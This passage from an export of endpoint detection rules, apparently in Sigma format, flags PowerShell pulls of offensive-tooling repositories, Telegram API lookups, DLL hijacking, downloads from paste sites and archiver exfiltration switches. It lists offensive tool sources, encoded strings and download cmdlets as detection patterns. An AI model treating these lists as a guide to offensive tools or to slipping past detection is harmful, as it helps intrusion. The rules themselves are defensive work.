'/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - '8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d242d0d4-fb07-43c1-8f33-f08f9c952b6f",
"rule_name": "URLs of Malicious Code Repository in PowerShell Command-line",
"rule_description": "Detects PowerShell commandlets containing a URL that references repositories used to host malicious code or offensive tooling.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack.\n",
"rule_creation_date": "2020-12-08",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d25b1a3a-9bf4-4d10-95eb-66d52cf64863",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625374Z",
"creation_date": "2026-03-23T11:45:34.625376Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625380Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf",
"https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_dns_resolution_telegram_api.yml",
"content": "title: DNS Resolution of Telegram API\nid: d25b1a3a-9bf4-4d10-95eb-66d52cf64863\ndescription: |\n Detects a DNS resolution request to the Telegram API.\n Adversaries may use an existing, legitimate external Web service like Telegram as a mean to sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether he can legitimately communicate with Telegram API.\nreferences:\n - https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf\n - https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/10/04\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: 'api.telegram.org'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n filter_telegram:\n ProcessSigned: 'true'\n ProcessSignature: 'Telegram FZ-LLC'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_xtensive_messenger:\n ProcessImage: '?:\\Program Files\\X-tensive\\Messenger\\DPA.Messenger.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_trellix:\n # C:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe\n ProcessDescription:\n - 'Trellix Adaptive Threat Protection Service'\n - 'McAfee Adaptive Threat Protection Service'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n exclusion_jetbrains:\n ProcessParentImage: '?:\\Program Files\\JetBrains\\PyCharm ????.*\\bin\\pycharm64.exe'\n\n exclusion_visualstudio:\n ProcessParentImage: '?:\\Program Files\\Microsoft Visual Studio\\\\??\\Professional\\Common7\\IDE\\CommonExtensions\\Platform\\Debugger\\VsDebugConsole.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d25b1a3a-9bf4-4d10-95eb-66d52cf64863",
"rule_name": "DNS Resolution of Telegram API",
"rule_description": "Detects a DNS resolution request to the Telegram API.\nAdversaries may use an existing, legitimate external Web service like Telegram as a mean to sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether he can legitimately communicate with Telegram API.\n",
"rule_creation_date": "2023-10-04",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d25d4f23-01a8-491f-9a6d-40fa4c24a691",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094260Z",
"creation_date": "2026-03-23T11:45:34.094262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094266Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicecensus.yml",
"content": "title: DLL Hijacking via devicecensus.exe\nid: d25d4f23-01a8-491f-9a6d-40fa4c24a691\ndescription: |\n Detects potential Windows DLL Hijacking via devicecensus.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicecensus.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dcntel.dll'\n - '\\fastprox.dll'\n - '\\flightsettings.dll'\n - '\\idstore.dll'\n - '\\IPHLPAPI.DLL'\n - '\\logoncli.dll'\n - '\\mmdevapi.dll'\n - '\\mswsock.dll'\n - '\\netutils.dll'\n - '\\npmproxy.dll'\n - '\\sapi_onecore.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\WINHTTP.dll'\n - '\\wlidprov.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\wbem\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d25d4f23-01a8-491f-9a6d-40fa4c24a691",
"rule_name": "DLL Hijacking via devicecensus.exe",
"rule_description": "Detects potential Windows DLL Hijacking via devicecensus.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2bc2fc3-bad0-46d1-8ded-549c64f89716",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603296Z",
"creation_date": "2026-03-23T11:45:34.603299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603308Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securityboulevard.com/2021/02/discord-cdn-a-popular-choice-for-hosting-malicious-payloads/",
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://attack.mitre.org/techniques/T1102/003/"
],
"name": "t1102_003_powershell_suspicious_download.yml",
"content": "title: Suspicious File Download via PowerShell\nid: d2bc2fc3-bad0-46d1-8ded-549c64f89716\ndescription: |\n Detects Web requests made by PowerShell to suspicious domains.\n These are usually existing, legitimate external Web services that allow users to host content.\n Popular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\n Adversaries can use these domains to send commands or upload payloads to a compromised system.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://securityboulevard.com/2021/02/discord-cdn-a-popular-choice-for-hosting-malicious-payloads/\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://attack.mitre.org/techniques/T1102/003/\ndate: 2023/01/16\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command:\n PowershellCommand|contains:\n - 'DownloadFile'\n - 'DownloadData'\n - 'DownloadString'\n - 'DeflateStream'\n - 'FromBase64String'\n - 'Invoke-WebRequest'\n - ' iwr '\n - ' iwr('\n - ' iwr;'\n - ' iwr\"'\n - ' iwr'''\n - '(iwr '\n - '(iwr('\n - '(iwr;'\n - '(iwr\"'\n - '(iwr'''\n - ';iwr '\n - ';iwr('\n - ';iwr;'\n - ';iwr\"'\n - ';iwr'''\n - '\"iwr '\n - '\"iwr('\n - '\"iwr;'\n - '\"iwr\"'\n - '\"iwr'''\n - '''iwr '\n - '''iwr('\n - '''iwr;'\n - '''iwr\"'\n - '''iwr'''\n\n selection_link:\n PowershellCommand|contains:\n - 'cdn.discordapp.com'\n - 'pastebin.com/raw'\n - 'paste.ee'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh/'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'paste.c-net.org'\n - 'ngrok-free.app/'\n - 'ngrok-free.dev/'\n - 'ngrok.app/'\n - 'ngrok.dev/'\n - 'ngrok.io/'\n\n exclusion_nable:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - '?:\\Program Files\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n\n # https://www.powershellgallery.com/packages/dbatools/1.0.135/Content/allcommands.ps1\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n - 'function Add-DbaAgListener {'\n - 'function Save-DbaDiagnosticQueryScript {'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2bc2fc3-bad0-46d1-8ded-549c64f89716",
"rule_name": "Suspicious File Download via PowerShell",
"rule_description": "Detects Web requests made by PowerShell to suspicious domains.\nThese are usually existing, legitimate external Web services that allow users to host content.\nPopular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\nAdversaries can use these domains to send commands or upload payloads to a compromised system.\nIt is recommended to investigate the PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-16",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1102.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2dec7ca-1e0f-4830-bdb7-913fefbd8a13",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098222Z",
"creation_date": "2026-03-23T11:45:34.098224Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098228Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoft_uev_cscunpintool.yml",
"content": "title: DLL Hijacking via microsoft.uev.cscunpintool.exe\nid: d2dec7ca-1e0f-4830-bdb7-913fefbd8a13\ndescription: |\n Detects potential Windows DLL Hijacking via microsoft.uev.cscunpintool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoft.uev.cscunpintool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\CSCAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2dec7ca-1e0f-4830-bdb7-913fefbd8a13",
"rule_name": "DLL Hijacking via microsoft.uev.cscunpintool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via microsoft.uev.cscunpintool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2e34f8d-c34b-4149-94f4-502c3fecc3e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628509Z",
"creation_date": "2026-03-23T11:45:34.628511Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628515Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_cache_dir.yml",
"content": "title: User Cache Directory Discovered via Python\nid: d2e34f8d-c34b-4149-94f4-502c3fecc3e3\ndescription: |\n Detects the discovery of the user cache directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve the user cache directory.\n It is recommended to check for other suspicious activity by the process or its parents and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_CACHE_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65538)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d2e34f8d-c34b-4149-94f4-502c3fecc3e3",
"rule_name": "User Cache Directory Discovered via Python",
"rule_description": "Detects the discovery of the user cache directory via the python3 os.confstr function.\nAttackers may use it during the discovery phase of an attack to retrieve the user cache directory.\nIt is recommended to check for other suspicious activity by the process or its parents and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d2eb031e-a992-4f43-8940-718b51c05cb9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606475Z",
"creation_date": "2026-03-23T11:45:34.606478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606486Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_gb/research/24/i/earth-preta-new-malware-and-strategies.html",
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "archiver_tool_suspicious_parameters.yml",
"content": "title: Archiver Tool Execution with Suspicious Arguments\nid: d2eb031e-a992-4f43-8940-718b51c05cb9\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, is used with suspicious arguments, such as wiping files after archiving or using encryption.\n These parameters have been used by threat actors for exfiltrating and deleting data.\n It is recommended to investigate this behavior to determine if this archiver is not being used on sensitive data.\nreferences:\n - https://www.trendmicro.com/en_gb/research/24/i/earth-preta-new-malware-and-strategies.html\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_application_winrar:\n - Image: '*\\rar.exe'\n - Description: 'Command line RAR'\n selection_application_7z:\n - Image:\n - '*\\7z.exe'\n - '*\\7za.exe'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_parameters:\n CommandLine:\n - '* -dw*' # rar : wipe files after archiving\n - '* -hp*' # rar : encrypt headers, filename, and data\n - '* -p*' # rar/7z : encrypt data\n - '* -sdel*' # 7z: delete files after compression\n - '* -ta*' # rar : process files modified after\n - '* -tb*' # rar : process files modified before\n\n exclusion_archive_type:\n CommandLine: '* -tbzip*' # 7z: can collide with -tb from rar\n\n exclusion_image:\n ParentImage:\n - '?:\\Program Files (x86)\\CERIG\\Sauvegarde CERIG .NET\\Sauvegarde_Cerig_Net.exe'\n - '?:\\Program Files (x86)\\Becton Dickinson\\EpiPreUpgrade\\EpiPreUpgrade.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\LPSecurityGuard.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\DMSWABarcodes.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\WAMonitor.exe'\n - '?:\\Program Files (x86)\\MicroScan\\Connect\\DMSDataEntry.exe'\n - '?:\\Program Files\\Qognify\\VMS\\tools\\Setup\\VMS_CORE.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files (x86)\\DesktopCentral_Agent\\bin\\dcagentservice.exe'\n - '?:\\Windows\\System32\\dgagent\\dsagent.exe'\n - 